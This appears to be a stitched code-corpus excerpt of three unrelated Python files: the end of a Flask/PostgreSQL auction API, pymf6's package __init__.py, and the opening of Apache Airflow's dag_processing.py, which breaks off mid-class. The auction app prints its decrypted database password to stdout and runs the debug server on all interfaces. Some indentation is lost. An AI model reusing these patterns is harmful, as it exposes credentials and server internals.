## GET http://localhost:8080/dbproj/leiloes
##
##
'''
def terminate_auctions():
while True:
return 1
'''
@app.route("/dbproj/leiloes", methods=['GET'], strict_slashes=True)
def get_all_auctions():
    """List the current version of every auction (id + description).

    Requires ``authToken`` in the JSON payload.
    """
    logger.info("### DEMO: GET /leiloes ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is required to list all auctions!'
    conn = db_connection()
    cur = conn.cursor()
    if return_user_id(payload["authToken"], cur) == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    result = []
    try:
        # Rows whose id equals versao_atual are the current auction versions.
        cur.execute("SELECT leilaoid, descricao FROM leilao where leilaoid = versao_atual")
        rows = cur.fetchall()
        logger.debug("---- leiloes ----")
        for row in rows:
            logger.debug(row)
            result.append({'leilaoId': int(row[0]), 'descricao': row[1]})
    except (Exception, psycopg2.DatabaseError) as error:
        # BUG FIX: a database error used to leak the connection (no
        # try/finally) and surface as an unhandled 500.
        logger.error(error)
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/leiloes/<keyword>", methods=['GET'], strict_slashes=True)
def get_auction_by_keyword(keyword):
    """Search current auctions by item id (numeric keyword) or description substring.

    A keyword that parses as an integer is matched against both the item id
    and the description; otherwise only the description is searched.
    """
    logger.info("### DEMO: GET /leiloes ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is required to list auctions with that keyword!'
    conn = db_connection()
    cur = conn.cursor()
    if return_user_id(payload["authToken"], cur) == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    keyword1 = '%' + keyword + '%'
    statement1 = """
        select leilaoid, descricao from leilao
        where leilaoid in
        (SELECT distinct versao_atual FROM leilao
        WHERE (artigo_artigoid = %s
        or descricao like %s ) )
        """
    statement2 = """
        select leilaoid, descricao from leilao
        where leilaoid in
        (SELECT distinct versao_atual FROM leilao
        WHERE descricao like %s )
        """
    result = []
    try:
        try:
            art_id = int(keyword)
        except ValueError:
            # non-numeric keyword: description search only
            cur.execute(statement2, (keyword1,))
        else:
            cur.execute(statement1, (str(art_id), keyword1))
        rows = cur.fetchall()
        logger.debug("---- leiloes ----")
        for row in rows:
            logger.debug(row)
            result.append({'leilaoId': int(row[0]), 'descricao': row[1]})
        if not result:
            result = 'No auction matches your search!'
    except (Exception, psycopg2.DatabaseError) as error:
        # BUG FIX: database errors used to leak the connection and
        # surface as an unhandled 500.
        logger.error(error)
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/leilao/", methods=['POST'])  # create a new auction
def add_auction():
    """Create an auction for an existing item via the insert_auction procedure.

    Required JSON keys: authToken, artigoId, precoMinimo, titulo, descricao,
    expira_leilao, nome.  The procedure returns the new auction id, or -1
    when nome does not match artigoId, or -2 when the expiry date is past.
    """
    logger.info("### DEMO: POST /leilao ###")
    payload = request.get_json()
    # validate all required keys in one pass (was one giant boolean chain)
    required = ("authToken", "artigoId", "precoMinimo", "titulo",
                "descricao", "expira_leilao", "nome")
    if any(key not in payload for key in required):
        return 'authToken, artigoId, precoMinimo, titulo, descricao, expira_leilao and nome are required to add an auction!'
    conn = db_connection()
    cur = conn.cursor()
    logger.info("---- new leilao ----")
    logger.debug(f'payload: {payload}')
    user_id = return_user_id(payload["authToken"], cur)
    if user_id == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    # parameterized queries, good for security and performance
    statement = """SELECT insert_auction(%s, %s, %s,%s, %s, %s, %s)"""
    values = (user_id, payload["artigoId"], payload["precoMinimo"], payload["titulo"], payload["descricao"], payload["expira_leilao"], payload["nome"])
    try:
        cur.execute(statement, values)
        l_id = cur.fetchone()
        if l_id[0] == -1:
            result = 'Name does not correspond to its id'
            cur.execute('rollback')
            return result  # the finally clause below still closes the connection
        elif l_id[0] == -2:
            result = 'expire date is in the past...'
            cur.execute('rollback')
            return result
        else:
            result = {"leilaoId": int(l_id[0])}
            cur.execute('commit')
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/leilao/<leilaoId>", methods=['PUT'])  # edit an auction's title/description
def update_auction(leilaoId):
    """Edit an auction by creating a new version row and updating it.

    Requires ``authToken`` plus ``titulo`` and/or ``descricao`` in the JSON
    payload.  The ``create_copy_to_update`` procedure clones the current
    auction row and returns the new row id, or a negative error code:
    -1 old version, -2 not the owner, -3 auction does not exist.
    """
    logger.info("### DEMO: PUT /leilao/id ###");
    payload = request.get_json()
    if "authToken" not in payload or ("titulo" not in payload and "descricao" not in payload):
        return 'authToken, titulo and/or descricao are required to update an auction!'
    conn = db_connection()
    cur = conn.cursor()
    logger.info("---- update leilao ----")
    logger.debug(f'payload: {payload}')
    user_id= return_user_id(payload["authToken"], cur)
    if user_id==-1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    # parameterized queries, good for security and performance
    statement = """SELECT create_copy_to_update(%s, %s)"""
    values = (leilaoId, user_id)
    try:
        cur.execute(statement, values)
        l_row= cur.fetchone()
        logger.info(str(l_row))
        if l_row[0] == -1:
            result = 'Error: Can\'t edit an old version of an auction'
        elif l_row[0]==-2:
            result = 'Error: Can\'t edit an auction you didn\'t open'
        elif l_row[0]==-3:
            result = 'The auction you are trying to edit does not exist!'
        else:
            # fetch the freshly cloned row so unchanged fields keep their values
            statement2 = """
                select * from leilao where leilaoid = %s
                """
            value2 = (l_row[0],)
            cur.execute(statement2, value2)
            row_to_update= cur.fetchone()
            # column order assumed: 0=leilaoid, 1=titulo, 2=descricao,
            # 3=artigo_artigoid, 4=expira_leilao -- TODO confirm against schema
            descricao = row_to_update[2]
            if "descricao" in payload:
                descricao = payload["descricao"]
            titulo = row_to_update[1]
            if "titulo" in payload:
                titulo = payload["titulo"]
            cur.execute("update leilao set titulo = %s, descricao= %s where leilaoid = %s", (titulo, descricao, row_to_update[0]))
            logger.info("after update")
            cur.execute('commit')
            result={'leilaoId': int(row_to_update[0]),'titulo' : titulo, 'descricao': descricao, 'artigoid': row_to_update[3], 'expire_date': row_to_update[4] }
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/leilao/<leilaoId>", methods=['GET'])  # full auction details
def details_auction(leilaoId):
    """Return full details of an auction: general info, item, messages, bids.

    ``leilaoId`` must be the current version of the auction
    (leilaoId == versao_atual); requires ``authToken`` in the JSON payload.
    """
    logger.info("### DEMO: GET /leilao/id ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is required to consult auction\'s details!'
    conn = db_connection()
    cur = conn.cursor()
    authToken = payload["authToken"]
    logger.debug(f'authToken: {authToken}')
    user_id = return_user_id(authToken, cur)
    if user_id == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    # parameterized queries, good for security and performance
    statement1 = """
        SELECT titulo, descricao, precoatual, expira_leilao , utilizador_userid
        from leilao ll where
        ll.leilaoId = %s and ll.leilaoId = ll.versao_atual
        """
    statement2 = """
        select * from artigo where artigoid = (select artigo_artigoid from leilao where leilaoId = %s);
        """
    statement3 = """
        select m.conteudo, m.data, u.username
        from mensagem m, utilizador u
        where leilao_leilaoid = %s
        and u.userid = m.utilizador_userid;
        """
    statement4 = """
        select l.licitaid, l.valor, l.licita_hora, u.username
        from licita l , utilizador u
        where leilao_leilaoid = %s
        and u.userid = l.utilizador_userid;
        """
    values = (leilaoId,)
    try:
        payload = []
        cur.execute(statement1, values)
        row = cur.fetchone()
        # BUG FIX: fetchone() returns None (never []) when nothing matches,
        # so the old `row != []` guard could not detect a missing auction.
        if row is not None:
            payload.append("General info on auction %s:" % leilaoId)
            # BUG FIX: this used to be a one-element list, so the
            # "organizador" assignment below raised TypeError on every
            # request (list indices must be integers); it must be a dict.
            content = {'titulo': row[0], 'descricao': row[1], 'precoatual': row[2], 'expira_leilao': row[3]}
            owner_id = row[4]
            cur.execute("select nome from utilizador where userid = %s", (owner_id, ))
            owner_username = cur.fetchone()
            content["organizador"] = owner_username[0]
            payload.append(content)  # appending to the payload to be returned
            payload.append("Item info")
            cur.execute(statement2, values)
            row = cur.fetchone()
            content = [{'artigoId': row[0], 'nome': row[1]}]
            payload.append(content)
            payload.append("Mensagens:")
            cur.execute(statement3, values)
            content = []
            for row in cur.fetchall():
                content.append({'conteudo': row[0], 'data': row[1], 'username': row[2]})
            payload.append(content)
            payload.append("Licitacoes:")
            cur.execute(statement4, values)
            content = []
            for row in cur.fetchall():
                content.append({'licitaid': row[0], 'valor': row[1], 'licita_hora': row[2], 'username': row[3]})
            payload.append(content)
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        payload = 'Error obtaining the info you asked for :(!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(payload)
@app.route("/dbproj/leilao/<leilaoId>/<licitacao>", methods=['PUT'])  # place a bid
def bid_leilao(leilaoId, licitacao):
    """Place a bid of value ``licitacao`` on auction ``leilaoId``.

    Requires ``authToken``.  The ``licitacao`` stored procedure returns
    negative codes for rejected bids (-1 too low, -2 auction ended,
    -3 own auction); anything else is accepted and committed.
    """
    logger.info("### DEMO: PUT /leilao/id ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is needed to make a bid'
    conn = db_connection()
    cur = conn.cursor()
    logger.debug(f'leilaoId: {leilaoId}; licitacao: {licitacao}')
    user_id = return_user_id(payload["authToken"], cur)
    if user_id == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    # BUG FIX: the original called float(licitacao) unguarded (and never
    # used the result), so a non-numeric bid raised an unhandled 500 and
    # leaked the connection.  Validate explicitly instead.
    try:
        float(licitacao)
    except ValueError:
        if conn is not None:
            conn.close()
        return 'licitacao must be a number'
    # Serializable isolation so two concurrent bids cannot both read the
    # same "current highest bid".
    statement = """
        begin transaction isolation level serializable;
        SELECT licitacao(%s, %s, %s)
        """
    values = (user_id, leilaoId, licitacao)
    try:
        cur.execute(statement, values)
        res = cur.fetchone()[0]
        logger.info(f'{res}')
        if res == -1:
            result = 'You need to bid higher than the last bid'
            cur.execute('rollback')
        elif res == -2:
            result = 'This auction has already ended!'
            cur.execute('rollback')
        elif res == -3:
            result = 'You cannot bid in your own auction!'
            cur.execute('rollback')
        else:
            cur.execute('commit')
            result = 'Your bid has been registered!'
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        result = 'Error while processing your bid!'
        cur.execute('rollback')
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
@app.route("/dbproj/lookup/", methods=['GET'])  # auctions related to the caller
def related_auctions():
    """List auctions the caller opened or whose bids generated notifications for them."""
    # BUG FIX: the log line wrongly said "PUT /leilao/id" (copy-paste).
    logger.info("### DEMO: GET /lookup ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is needed to list related auctions'
    authToken = payload["authToken"]
    conn = db_connection()
    cur = conn.cursor()
    logger.debug(f'authToken: {authToken}')
    # (the original assigned authToken a second time here -- removed)
    user_id = return_user_id(authToken, cur)
    if user_id == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    # parameterized queries, good for security and performance
    statement = """
        SELECT leilaoid, titulo, descricao, precoatual, expira_leilao
        from leilao ll where
        ll.utilizador_userid = %s and ll.leilaoid = ll.versao_atual
        or exists (select licita_utilizador_utilizadorid
        from notificacao_licita_licita n
        where n.utilizador_userid = %s and n.licita_licitaid =ll.leilaoid )
        """
    values = (user_id, user_id)
    try:
        result = []
        cur.execute(statement, values)
        rows = cur.fetchall()
        for row in rows:
            logger.debug(row)
            result.append({'leilaoId': row[0], 'titulo': row[1], 'descricao': row[2], 'precoatual': row[3], 'data_expira': row[4]})
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        result = 'Error obtaining the info you asked for :(!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
## Demo GET
##
## Obtain the item (artigo) with id <artigoId>
##
## To use it, access:
##
## GET http://localhost:8080/dbproj/artigo/10
##
@app.route("/dbproj/artigo/<artigoId>", methods=['GET'])
def get_item(artigoId):
    """Return the id and name of the item identified by ``artigoId``."""
    logger.info("### DEMO: GET /artigos/<artigoId> ###")
    payload = request.get_json()
    if "authToken" not in payload:
        return 'authToken is needed to consult an item'
    conn = db_connection()
    cur = conn.cursor()
    authToken = payload["authToken"]
    if return_user_id(authToken, cur) == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    logger.debug(f'artigoId: {artigoId}')
    cur.execute("SELECT artigoId, nome FROM artigo where artigoid = %s", (artigoId,))
    rows = cur.fetchall()
    # BUG FIX: fetchall() returns an empty list (never None), so the old
    # `rows is None` check could never fire and rows[0] raised IndexError
    # on a miss; the connection also leaked on that path.
    if not rows:
        conn.close()
        return 'No matches for your search!'
    row = rows[0]
    logger.debug("---- selected item ----")
    logger.debug(row)
    content = {'artigoId': int(row[0]), 'nome': row[1]}
    conn.close()
    return jsonify(content)
##
## Demo POST
##
## Add a new item (artigo) in a JSON payload
##
## To use it, you need to use postman or curl:
##
## curl -X POST http://localhost:8080/dbproj/artigo/ -H "Content-Type: application/json" -d '{"authToken": "...", "artigoId": 69, "nome": "Artigo"}'
##
@app.route("/dbproj/artigo/", methods=['POST'])  # item insertion
def insert_item():
    """Insert a new item (artigo); requires authToken, artigoId and nome."""
    logger.info("### DEMO: POST /artigo ###")
    payload = request.get_json()
    # ROBUSTNESS FIX: the original only checked authToken, so a payload
    # missing artigoId/nome raised KeyError and answered with a 500.
    if "authToken" not in payload or "artigoId" not in payload or "nome" not in payload:
        return 'authToken, artigoId and nome are needed to add an item'
    conn = db_connection()
    cur = conn.cursor()
    authToken = payload["authToken"]
    if return_user_id(authToken, cur) == -1:
        if conn is not None:
            conn.close()
        return 'Invalid token: check it or login again'
    logger.info("---- new artigo ----")
    logger.debug(f'payload: {payload}')
    # parameterized queries, good for security and performance
    statement = """
        INSERT INTO artigo (artigoId, nome)
        VALUES ( %s, %s )"""
    values = (payload["artigoId"], payload["nome"])
    try:
        cur.execute(statement, values)
        cur.execute('commit')
        result = 'Inserted!'
    except (Exception, psycopg2.DatabaseError) as error:
        logger.error(error)
        cur.execute('rollback')
        result = 'Failed!'
    finally:
        if conn is not None:
            conn.close()
    return jsonify(result)
##########################################################
## DATABASE ACCESS
##########################################################
def db_connection():
    """Open a new PostgreSQL connection with the credentials loaded in __main__.

    Relies on the module-level globals ``usr``, ``pswd``, ``hst`` and
    ``dbase`` set from the decrypted credentials file.  Autocommit is
    disabled, so callers must issue explicit commit/rollback.
    """
    db = psycopg2.connect(user = usr,
                          password = pswd,
                          host = hst,
                          port = "5432",
                          database = dbase)
    db.set_session(autocommit=False)
    return db
##########################################################
## MAIN
##########################################################
if __name__ == "__main__":
    # Decrypt DB credentials; expected CSV format: "user,password,host,database".
    ret = dec_file('.creds_crypto')
    # SECURITY NOTE(review): printing decrypted credentials to stdout leaks
    # secrets -- keep only for local debugging.
    print(ret)
    ar = ret.split(',')
    print('User: %s' % ar[0])
    usr= ar[0]
    print('Password: %s' % ar[1])
    pswd= ar[1]
    print('Host: %s' % ar[2])
    hst= ar[2]
    print('Database: %s' % ar[3])
    dbase= ar[3]
    # Background worker thread; presumably notifies winning bidders when
    # auctions end (warn_winning_bidders is defined elsewhere in this file).
    x = threading.Thread(target=warn_winning_bidders, args=())
    x.start()
    print('Boo1')
    # Set up the logging: file sink via basicConfig plus a DEBUG-level
    # console handler on the named 'logger' used by the route handlers.
    logging.basicConfig(filename="logs/log_file.log")
    print('Boo2')
    logger = logging.getLogger('logger')
    logger.setLevel(logging.DEBUG)
    ch = logging.StreamHandler()
    ch.setLevel(logging.DEBUG)
    print('Boo3')
    # create formatter (time-only timestamps to keep log lines short)
    formatter = logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s',
                                  '%H:%M:%S')
    # "%Y-%m-%d %H:%M:%S") # not using DATE to simplify
    ch.setFormatter(formatter)
    logger.addHandler(ch)
    print('Boo4')
    time.sleep(1) # just to let the DB start before this print :-)
    logger.info("\n---------------------------------------------------------------\n" +
                "API v1.0 online: http://localhost:8080/departments/\n\n")
    app.run(host="0.0.0.0", debug=True, threaded=True)
|
__init__.py | """
Python Wrapper for MODFLOW 6
"""
from multiprocessing import Process
from . mf6 import mf6_sub # pylint: disable-msg=no-name-in-module
__all__ = ['__version__', '__name__', '__author__']
__version__ = '0.5.0'
__name__ = 'pymf6' # pylint: disable=redefined-builtin
__author__ = 'Mike Müller'
MFSIM_NAM = 'mfsim.nam'
BACKUP_DIR = '__pymf6__backup'
DATA_MAPPING = 'data_mapping.pkl'
def func(callback, kwargs):
    """Helper function for run with `multiprocessing`.

    Builds a class combining the user-supplied ``callback`` with
    ``pymf6.callback.Func`` (imported lazily, presumably to avoid an
    import cycle -- confirm) and hands an instance of it to ``mf6_sub``,
    the MODFLOW 6 entry point from the compiled extension module.

    :param callback: user class mixed in ahead of ``Func`` in the MRO
    :param kwargs: keyword arguments for the callback, or None for none
    """
    from pymf6.callback import Func
    class MyFunc(callback, Func):
        pass
    if kwargs is None:
        kwargs = {}
    mf6_sub(MyFunc(**kwargs))
def run(callback, kwargs):
    """Run the MF6 model in the current paths with `callback`.

    The model runs in a child process which is joined before returning;
    NOTE(review): presumably this isolates the native MF6 state from the
    caller -- confirm.
    """
    worker = Process(target=func, args=(callback, kwargs))
    worker.start()
    worker.join()
|
dag_processing.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
import enum
from typing import NamedTuple, Iterable
import psutil
from setproctitle import setproctitle
import six
from six.moves import reload_module
from sqlalchemy import or_
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.settings import Stats
from airflow.models import errors
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
# Python 2 has no built-in ConnectionError; alias it to IOError so the
# `except ConnectionError` handlers in this module work on both majors.
if six.PY2:
    ConnectionError = IOError
class SimpleDag(BaseDag):
    """
    A simplified representation of a DAG that contains all attributes
    required for instantiating and scheduling its associated tasks.

    :param dag: the DAG
    :type dag: airflow.models.DAG
    :param pickle_id: ID associated with the pickled version of this DAG.
    :type pickle_id: unicode
    """

    def __init__(self, dag, pickle_id=None):
        self._dag_id = dag.dag_id
        self._task_ids = [task.task_id for task in dag.tasks]
        self._full_filepath = dag.full_filepath
        self._is_paused = dag.is_paused
        self._concurrency = dag.concurrency
        self._pickle_id = pickle_id
        # Per-task overrides keyed by task_id; only tasks that actually set
        # a special argument get an entry.
        self._task_special_args = {}
        for task in dag.tasks:
            extras = {}
            if task.task_concurrency is not None:
                extras['task_concurrency'] = task.task_concurrency
            if extras:
                self._task_special_args[task.task_id] = extras

    @property
    def dag_id(self):
        """The DAG ID (unicode)."""
        return self._dag_id

    @property
    def task_ids(self):
        """List of the task IDs in this DAG."""
        return self._task_ids

    @property
    def full_filepath(self):
        """Absolute path of the file containing this DAG's definition."""
        return self._full_filepath

    @property
    def concurrency(self):
        """Maximum number of tasks that can run simultaneously from this DAG."""
        return self._concurrency

    @property
    def is_paused(self):
        """Whether this DAG is paused."""
        return self._is_paused

    @property
    def pickle_id(self):
        """The pickle ID for this DAG, or None if it has none."""
        return self._pickle_id

    @property
    def task_special_args(self):
        """Mapping of task_id to its dict of special arguments."""
        return self._task_special_args

    def get_task_special_arg(self, task_id, special_arg_name):
        """Return the named special argument for a task, or None when absent."""
        return self._task_special_args.get(task_id, {}).get(special_arg_name)
class SimpleTaskInstance(object):
    """A lightweight, picklable snapshot of a TaskInstance's fields."""

    def __init__(self, ti):
        self._dag_id = ti.dag_id
        self._task_id = ti.task_id
        self._execution_date = ti.execution_date
        self._start_date = ti.start_date
        self._end_date = ti.end_date
        self._try_number = ti.try_number
        self._state = ti.state
        self._executor_config = ti.executor_config
        # Some TaskInstance variants may lack these attributes; fall back
        # to None (same semantics as the hasattr checks this replaces).
        self._run_as_user = getattr(ti, 'run_as_user', None)
        self._pool = getattr(ti, 'pool', None)
        self._priority_weight = getattr(ti, 'priority_weight', None)
        self._queue = ti.queue
        self._key = ti.key

    @property
    def dag_id(self):
        return self._dag_id

    @property
    def task_id(self):
        return self._task_id

    @property
    def execution_date(self):
        return self._execution_date

    @property
    def start_date(self):
        return self._start_date

    @property
    def end_date(self):
        return self._end_date

    @property
    def try_number(self):
        return self._try_number

    @property
    def state(self):
        return self._state

    @property
    def pool(self):
        return self._pool

    @property
    def priority_weight(self):
        return self._priority_weight

    @property
    def queue(self):
        return self._queue

    @property
    def key(self):
        return self._key

    @property
    def executor_config(self):
        return self._executor_config

    @provide_session
    def construct_task_instance(self, session=None, lock_for_update=False):
        """
        Construct a TaskInstance from the database based on the primary key
        :param session: DB session.
        :param lock_for_update: if True, indicates that the database should
            lock the TaskInstance (issuing a FOR UPDATE clause) until the
            session is committed.
        """
        TI = airflow.models.TaskInstance
        query = session.query(TI).filter(
            TI.dag_id == self._dag_id,
            TI.task_id == self._task_id,
            TI.execution_date == self._execution_date)
        if lock_for_update:
            return query.with_for_update().first()
        return query.first()
class SimpleDagBag(BaseDagBag):
    """
    A collection of SimpleDag objects with some convenience methods.
    """

    def __init__(self, simple_dags):
        """
        Constructor.
        :param simple_dags: SimpleDag objects that should be in this
        :type list(airflow.utils.dag_processing.SimpleDagBag)
        """
        self.simple_dags = simple_dags
        self.dag_id_to_simple_dag = {sd.dag_id: sd for sd in simple_dags}

    @property
    def dag_ids(self):
        """IDs of all the DAGs in this bag."""
        return self.dag_id_to_simple_dag.keys()

    def get_dag(self, dag_id):
        """Return the SimpleDag for ``dag_id``; raise AirflowException if unknown."""
        try:
            return self.dag_id_to_simple_dag[dag_id]
        except KeyError:
            raise AirflowException("Unknown DAG ID {}".format(dag_id))
def correct_maybe_zipped(fileloc):
    """
    If the path contains a folder with a .zip suffix, then
    the folder is treated as a zip archive and path to zip is returned.
    """
    # Split "<archive>.zip<sep><member>" into the archive prefix (group 2)
    # and the trailing member path; group 2 is None when no ".zip<sep>"
    # component is present.
    match = re.search(r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc)
    archive = match.group(2)
    if archive and zipfile.is_zipfile(archive):
        return archive
    return fileloc
# Strips trailing "# ..." comments from .airflowignore lines.
COMMENT_PATTERN = re.compile(r"\s*#.*")


def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
                       include_examples=None):
    """
    Traverse a directory and look for Python files.
    :param directory: the directory to traverse
    :type directory: unicode
    :param safe_mode: whether to use a heuristic to determine whether a file
        contains Airflow DAG definitions. If not provided, use the
        core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
        to safe.
    :type safe_mode: bool
    :param include_examples: include example DAGs
    :type include_examples: bool
    :return: a list of paths to Python files in the specified directory
    :rtype: list[unicode]
    """
    if include_examples is None:
        include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
    file_paths = []
    if directory is None:
        return []
    elif os.path.isfile(directory):
        return [directory]
    elif os.path.isdir(directory):
        # Regex ignore patterns accumulated per directory from .airflowignore
        # files; children inherit a copy of their parent's patterns.
        patterns_by_dir = {}
        for root, dirs, files in os.walk(directory, followlinks=True):
            patterns = patterns_by_dir.get(root, [])
            ignore_file = os.path.join(root, '.airflowignore')
            if os.path.isfile(ignore_file):
                with open(ignore_file, 'r') as f:
                    # If we have new patterns create a copy so we don't change
                    # the previous list (which would affect other subdirs)
                    lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in f.read().split("\n")]
                    patterns += [re.compile(line) for line in lines_no_comments if line]
            # If we can ignore any subdirs entirely we should - fewer paths
            # to walk is better. We have to modify the ``dirs`` array in
            # place for this to affect os.walk
            dirs[:] = [
                d
                for d in dirs
                if not any(p.search(os.path.join(root, d)) for p in patterns)
            ]
            # We want patterns defined in a parent folder's .airflowignore to
            # apply to subdirs too
            for d in dirs:
                patterns_by_dir[os.path.join(root, d)] = list(patterns)
            for f in files:
                try:
                    file_path = os.path.join(root, f)
                    if not os.path.isfile(file_path):
                        continue
                    mod_name, file_ext = os.path.splitext(
                        os.path.split(file_path)[-1])
                    # Only .py files and zip archives can hold DAGs.
                    if file_ext != '.py' and not zipfile.is_zipfile(file_path):
                        continue
                    if any([re.findall(p, file_path) for p in patterns]):
                        continue
                    # Heuristic that guesses whether a Python file contains an
                    # Airflow DAG definition.
                    might_contain_dag = True
                    if safe_mode and not zipfile.is_zipfile(file_path):
                        with open(file_path, 'rb') as fp:
                            content = fp.read()
                            might_contain_dag = all(
                                [s in content for s in (b'DAG', b'airflow')])
                    if not might_contain_dag:
                        continue
                    file_paths.append(file_path)
                except Exception:
                    # Never let one unreadable file abort the whole scan.
                    log = LoggingMixin().log
                    log.exception("Error while examining %s", f)
    if include_examples:
        import airflow.example_dags
        example_dag_folder = airflow.example_dags.__path__[0]
        file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
    return file_paths
class AbstractDagFileProcessor(object):
    """
    Processes a DAG file. See SchedulerJob.process_file() for more details.
    """
    # NOTE(review): assigning ``__metaclass__`` only takes effect on
    # Python 2; Python 3 ignores it, so the @abstractmethod markers are not
    # enforced there -- consider ``@six.add_metaclass(ABCMeta)``.
    __metaclass__ = ABCMeta

    @abstractmethod
    def start(self):
        """
        Launch the process to process the file
        """
        raise NotImplementedError()

    @abstractmethod
    def terminate(self, sigkill=False):
        """
        Terminate (and then kill) the process launched to process the file
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def pid(self):
        """
        :return: the PID of the process launched to process the given file
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def exit_code(self):
        """
        After the process is finished, this can be called to get the return code
        :return: the exit code of the process
        :rtype: int
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def done(self):
        """
        Check if the process launched to process this file is done.
        :return: whether the process is finished running
        :rtype: bool
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def result(self):
        """
        A list of simple dags found, and the number of import errors
        :return: result of running SchedulerJob.process_file()
        :rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def start_time(self):
        """
        :return: When this started to process the file
        :rtype: datetime
        """
        raise NotImplementedError()

    @property
    @abstractmethod
    def file_path(self):
        """
        :return: the path to the file that this is processing
        :rtype: unicode
        """
        raise NotImplementedError()
# Message type sent from the manager to the agent over the signal pipe
# (py2-compatible functional NamedTuple syntax -- keep as-is).
DagParsingStat = NamedTuple('DagParsingStat', [
    ('file_paths', Iterable[str]),
    ('done', bool),
    ('all_files_processed', bool)
])
# Per-file parsing statistics record.
DagFileStat = NamedTuple('DagFileStat', [
    ('num_dags', int),
    ('import_errors', int),
    ('last_finish_time', datetime),
    ('last_duration', float),
    ('run_count', int),
])


class DagParsingSignal(enum.Enum):
    """Control signals exchanged between the agent and the manager process."""
    AGENT_HEARTBEAT = 'agent_heartbeat'
    TERMINATE_MANAGER = 'terminate_manager'
    END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
             dag_directory,
             file_paths,
             max_runs,
             processor_factory,
             processor_timeout,
             async_mode):
    """
    :param dag_directory: Directory where DAG definitions are kept. All
        files in file_paths should be under this directory
    :type dag_directory: unicode
    :param file_paths: list of file paths that contain DAG definitions
    :type file_paths: list[unicode]
    :param max_runs: The number of times to parse and schedule each file. -1
        for unlimited.
    :type max_runs: int
    :param processor_factory: function that creates processors for DAG
        definition files. Arguments are (dag_definition_path, log_file_path)
    :type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
    :param processor_timeout: How long to wait before timing out a DAG file processor
    :type processor_timeout: timedelta
    :param async_mode: Whether to start agent in async mode
    :type async_mode: bool
    """
    self._file_paths = file_paths
    self._file_path_queue = []
    self._dag_directory = dag_directory
    self._max_runs = max_runs
    self._processor_factory = processor_factory
    self._processor_timeout = processor_timeout
    self._async_mode = async_mode
    # Map from file path to the processor
    self._processors = {}
    # Manager subprocess handle; created by start().
    self._process = None
    self._done = False
    # Initialized as true so we do not deactivate w/o any actual DAG parsing.
    self._all_files_processed = True
    # Parent end of the signal pipe; created by start().
    self._parent_signal_conn = None
    # SimpleDags received from the manager, drained by harvest_simple_dags().
    self._collected_dag_buffer = []
def start(self):
    """
